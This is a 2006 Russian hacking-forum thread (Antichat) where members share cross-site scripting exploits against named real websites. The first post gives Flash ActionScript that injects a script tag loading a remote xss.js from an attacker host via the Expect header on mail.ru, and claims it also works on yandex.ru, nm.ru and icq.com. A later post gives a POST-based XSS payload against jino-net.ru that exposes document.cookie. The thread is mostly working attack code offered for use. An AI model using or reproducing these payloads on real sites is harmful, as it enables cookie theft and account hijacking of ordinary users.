HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Xss на mail.ru через expect заголовок.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss на mail.ru через expect заголовок.
  #1  
Старый 16.10.2006, 19:56
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами: 10676486

Репутация: 774
По умолчанию Xss на mail.ru через expect заголовок.
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:



PHP код:
var req:LoadVars=new LoadVars(); 
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); 
req.decode("XSS"); 
req.send("http://www.mail.ru","POST"); 
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.

Уменьшаем размер и экспортируем Flash: File->Export->Export Image.





Вот в принципе и все. Думаю вы знаете что дальше делать.

P.S. Еще работает на yandex.ru, nm.ru и icq.com.
𝕏 Twitter Reddit Telegram Копировать ссылку
__________________

Завтра будет.Лучше.
Последний раз редактировалось Go0o$E; 16.10.2006 в 20:38..
 
Ответить с цитированием

  #2  
Старый 16.10.2006, 21:10
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию
гыгыгы опера пелеплюнула фаерворкс =) А так метод уже рассматривался и я удивлен, почему же так редко упоминается, ведь пока что тема реально работает. оч рад +
 
Ответить с цитированием

  #3  
Старый 16.10.2006, 21:22
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами: 10676486

Репутация: 774
По умолчанию
Да уязвимость не нова, но работает еще много где! =)
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

Post Xss на jino-net.ru
  #4  
Старый 20.10.2006, 23:30
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами: 10676486

Репутация: 774
По умолчанию Post Xss на jino-net.ru
Так же на actionscript можно проводить xss через post запросы.

Пример: XSS на jino-net.ru

PHP код:
var req:LoadVars=new LoadVars();  
req.decode("subject=spam&name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=&message="); 
req.send("http://www.jino-net.ru/contacts.phtml?subj=spam","POST"); 
__________________

Завтра будет.Лучше.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss на mail.ru em00s7 Уязвимости Mail-сервис 14 08.06.2006 00:38
Broken image, при использовании XSS через аватару Qwazar PHP 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.